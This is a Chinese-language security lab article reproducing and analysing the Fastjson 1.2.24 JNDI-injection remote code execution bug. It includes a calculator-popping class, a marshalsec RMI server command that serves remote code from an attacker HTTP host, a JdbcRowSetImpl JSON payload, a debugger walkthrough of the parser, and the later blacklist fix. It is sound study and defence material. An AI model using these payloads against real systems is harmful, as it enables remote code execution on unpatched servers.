出品|MS08067實驗室(www.ms08067.com)
本文作者:愛吃芝士的小葵(Ms08067實驗室追洞小組成員)
1、靶場搭建
2、漏洞復現
3、漏洞分析
4、漏洞修復
5、心得
靶場搭建
使用idea maven專案創建,在pom中匯入fastjson的坐標,(因為本文復現1.2.24的rce,所以版本要小于1.2.24,本文采 取1.2.23版本坐標),
匯入之后在右邊點擊maven圖示匯入,
**坑點
其中環境有一個非常細小的點,可以說是個大坑,我除錯了很久,之前的報錯如下:
1、rmi+jndi環境:java.sql.SQLException: JdbcRowSet (連接) JNDI 無法連接 2、ldap+jndi環境:java.lang.ClassCastException: javax.naming.Reference cannot be cast to javax.sql.DataSource
后來才發現是java的環境沒有配置對,雖然都是jdk1.8,但是復現的環境采用1.8.0_102,之前的環境1.8.0_221沒有復現成 功,因為JDK 8u113 之后,系統屬性 com.sun.jndi.rmi.object.trustURLCodebase 、 com.sun.jndi.cosnaming.object.trustURLCodebase 的默認值變為false,即默認不允許RMI、cosnaming從遠程的 Codebase加載Reference工廠類,
漏洞復現
一、準備被遠程下載的class檔案
這邊簡單彈個計算器,也可以反彈shell
package com.v1rus;
public class Calc{
public Calc(){
try{
Runtime.getRuntime().exec("calc");
}catch (Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Calc c = new Calc();
}
}
命令列輸入 javac Calc.java ,在當前檔案夾下會生成Calc.class檔案,
二、 http服務
可以簡單的用python3在當前Calc.class檔案的檔案夾下起http服務
python -m http.server 8088
三、RMI服務
使用marshalsec起rmi服務
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.249.156:8088/#Calc" 8
漏洞分析
fastjson在決議json的程序中,支持使用autoType來實體化某一個具體的類,并呼叫該類的set/get方法來訪問屬性,通過查找代碼中相關的方法,即可構造出一些惡意利用鏈,
首先放上服務端使用的poc demo:
package com.v1rus;
import com.alibaba.fastjson.JSON;
public class Test {
public static void main(String[] args) {
String v1rus = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.249.15
JSON.parseObject(v1rus);
}
}
一、熟悉fastjson作業流程
我們的poc中用到的類是
com.sun.rowset.JdbcRowSetImpl
Exception in thread "main" com.alibaba.fastjson.JSONException: set property error, autoCommit
at com.alibaba.fastjson.parser.deserializer.FieldDeserializer.setValue(FieldDeserializer.java:131)
at com.alibaba.fastjson.parser.deserializer.DefaultFieldDeserializer.parseField(DefaultFieldDeserializer.j
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.parseField(JavaBeanDeserializer.java:722)
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:568)
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.parseRest(JavaBeanDeserializer.java:877)
at com.alibaba.fastjson.parser.deserializer.FastjsonASMDeserializer_1_JdbcRowSetImpl.deserialze(Unknown So
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:183)
at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:368)
at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1327) at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1293)
at com.alibaba.fastjson.JSON.parse(JSON.java:137) at com.alibaba.fastjson.JSON.parse(JSON.java:128)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:201) at com.v1rus.Test.main(Test.java:8)
我們直接進入 com.alibaba.fastjson.JSON 這個類中,并在parseObject函式上面下斷點,
最后會跟到這個方法上,通過DefaultJSONParser類去parse我們傳入的字串
跟進74行的parse代碼,這里是根據JSONLexer的token為12到case的判斷,進入關鍵函式
根據lexer.token()方法回傳token的值,這里是12,所以進入else進行處理,
然后進入while(true)回圈,第一步驟就是lexer.skipWhitespace,跟進去查看方法
因而回傳的是 “ 號,所以可以進入if判斷,根據變數名我們也可以得知,scanSymbol這個方法回傳的是key關鍵字,
(key、value對)
大家可以簡單的跟進
com.alibaba.fastjson.parser.JSONLexerBase#scanSymbol
這個函式走一下流程,最后會通過雙引號的閉合判斷來回傳value字串,這邊回傳的就是第一個字串 @type
繼續往下走到了這里,將key和全域靜態常量作比較看是否為 @type ,如果是的話,進入if判斷,
跟進 com.alibaba.fastjson.util#loadClass ,這里面并沒有做什么黑名單的過濾就講這個類物件回傳了,
上面那行代碼,跟進分析
判斷是類名回傳
跟進方法分析回傳
FastJsonASMDeserializer_1_JdbcRowSetImpl
再跟進deserialze后繼續往下除錯,進入setDataSourceName方法,將dataSourceName值設定為目標RMI服務的地址
一路跟到parseField方法
呼叫smartMatch方法來處理我們傳入的key值,跟進這個方法
之后回跟到
((FieldDeserializer)fieldDeserializer).parseField(parser, object, objectType, fieldValues);這行代碼,進入FieldDeserializer的parseField方法,進行一些Field的賦值操作,
再跟進
com.alibaba.fastjson.parser.deserializer.FieldDeserializer#setValue方法,根據fieldInfo.fieldClass判斷該類,最后進入箭頭指向的else體,通過反射呼叫setAutoCommit關鍵方法,嘿嘿,接下來不是為所欲為,
這個jdk自帶的類必須要先獲得一個connection,如果沒有的話先執行connect方法,我們進去看看里面有什么,
因為我們在前面通過setDataSourceName()方法設定了dataSourceName的值,所以進入esle if通過lookup方法去獲取dataSource,而rmi(java遠程方法呼叫機制)的主角就是這個方法,如果lookup里面傳入的引數可控,就可以指向我們所構造的rmi服務,那么就有很大的可能被攻擊,(InitialContext 是一個實作了Context介面的類,使用這個類作為JNDI命名服務的入口點,)
這里也簡單提一句JNDI和RMI關系,以便更好理解,簡單來說,JNDI (Java Naming and Directory Interface)是一組應用程式介面,JNDI底層支持RMI遠程物件,RMI注冊的服務可以通過JNDI介面來訪問和呼叫,JNDI介面在初始化時,可以將RMI URL作為引數傳入,而JNDI注入就出現在客戶端的lookup()函式中,
用referenceWrapper包裝reference類,注冊在jndi的rmi服務實作上,這里rmi服務器系結的類并沒有實作相應的介面,而是通過Refernces類來系結過一個外部的遠程物件,(這里先提及一下,后面會詳細說明)一路跟進到這個最終的方法,該方法執行完就會加載完遠程類實作rce,可以看到這里的var3是RegistryContext類,呼叫lookup函式,
跟進去時候傳入的這個引數是Calc也就是/后面的請求檔案,不為空之后呼叫this.registry(RegistryImpl_Stub,stub和skel的概念是相對而言的,并不只存在于服務端和客戶端之間)的lookup方法,是我們可控的,所以就造成了JNDI注入漏洞,
繼續跟進marshelsec可能會出現這樣的錯誤:
java.net.SocketTimeoutException: Read timed out
at java.net.SocketInputStream.socketRead0(Native Method)
at java.net.SocketInputStream.socketRead(Unknown Source)
at java.net.SocketInputStream.read(Unknown Source)
at java.net.SocketInputStream.read(Unknown Source)
at java.io.BufferedInputStream.fill(Unknown Source)
at java.io.BufferedInputStream.read(Unknown Source)
at java.io.FilterInputStream.read(Unknown Source)
at marshalsec.jndi.RMIRefServer.doMessage(RMIRefServer.java:221)
at marshalsec.jndi.RMIRefServer.run(RMIRefServer.java:171)
at marshalsec.jndi.RMIRefServer.main(RMIRefServer.java:117)
原因是網路讀取資料超時,我們跟進方法的同時加長的資料傳輸的時間,等待超時拋出錯誤,至此利用的部分已經結束,
疑惑
因為JNDI注入中RMI服務器最終執行遠程方法,但是目標服務器lookup()一個惡意的RMI服務地址,反而是目標服務器執行了,那么究竟是什么原因?
在JNDI服務中,RMI服務端除了直接系結遠程物件之外,還可以通過Reference類來系結一個外部的遠程物件(當前名稱目錄系統之外的物件),系結了Reference之后,服務端會先通過Referenceable.getReference()獲取系結物件的參考,并且在目錄中保存,當客戶端在lookup()查找這個遠程物件時,客戶端會獲取相應的object factory,最終通過factory類將reference轉換為具體的物件實體,
簡而言之,在Server系結Reference時,這個惡意物件是不在Server上的,Reference指向某個地址,Client會去這個地址
取出物件并在Client實體化,
總結
攻擊者準備rmi服務和web服務,將rmi絕對路徑注入到lookup方法中,受害者JNDI介面會指向攻擊者控制rmi服務器,JNDI介面向攻擊者控制web服務器遠程加載惡意代碼,執行建構式造成RCE,
漏洞修復
從1.2.25開始對這個漏洞進行了修補,修補方式是會在com.alibaba.fastjson.parser.DefaultJSONParser#parseObject方法中呼叫 com.alibaba.fastjson.parser.ParserConfig#checkAutoType來檢查我們傳入的類是不是在黑名單中,也就是將TypeUtils.loadClass替換為checkAutoType()函式:
只有通過了白名單的校驗才會呼叫loadClass,
但是這里同時使用白名單和黑名單的方式來限制反序列化的類,只有當白名單不通過時才會進行黑名單判斷,相當于白名單并沒有真正起到白名單的作用,我們仍然可以進入后續的流程來進行繞過,
黑名單里面禁止了一些常見的反序列化漏洞利用鏈:
bsh
com.mchange
com.sun.
java.lang.Thread
java.net.Socket
java.rmi
javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework
心得
1、 Fastjson主要還是利用了autotype功能實作"@type"欄位指定反序列化的Class型別,所以盡量關閉autotype就沒有問題,雖然Fastjson在1.2.24之后實作了一套黑名單,但還是存在被繞過風險,
2、 rmi在fastjson中的利用只是jndi的一種手段,還有ldap等,是在rmi服務器上系結reference物件,與rmi本身的反序列話不是很有關系,它將從攻擊者控制的服務器獲取工廠類,然后實體化工廠以回傳 JNDI所參考的物件的新實體,
?
?
?
轉載請聯系作者并注明出處!
Ms08067安全實驗室專注于網路安全知識的普及和培訓,團隊已出版《Web安全攻防:滲透測驗實戰指南》,《內網安全攻防:滲透測驗實戰指南》,《Python安全攻防:滲透測驗實戰指南》,《Java代碼安全審計(入門篇)》等書籍,
團隊公眾號定期分享關于CTF靶場、內網滲透、APT方面技術干貨,從零開始、以實戰落地為主,致力于做一個實用的干貨分享型公眾號,
官方網站:https://www.ms08067.com/
掃描下方二維碼加入實驗室VIP社區
加入后邀請加入內部VIP群,內部微信群永久有效!
?
?
?
?
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/270663.html
標籤:其他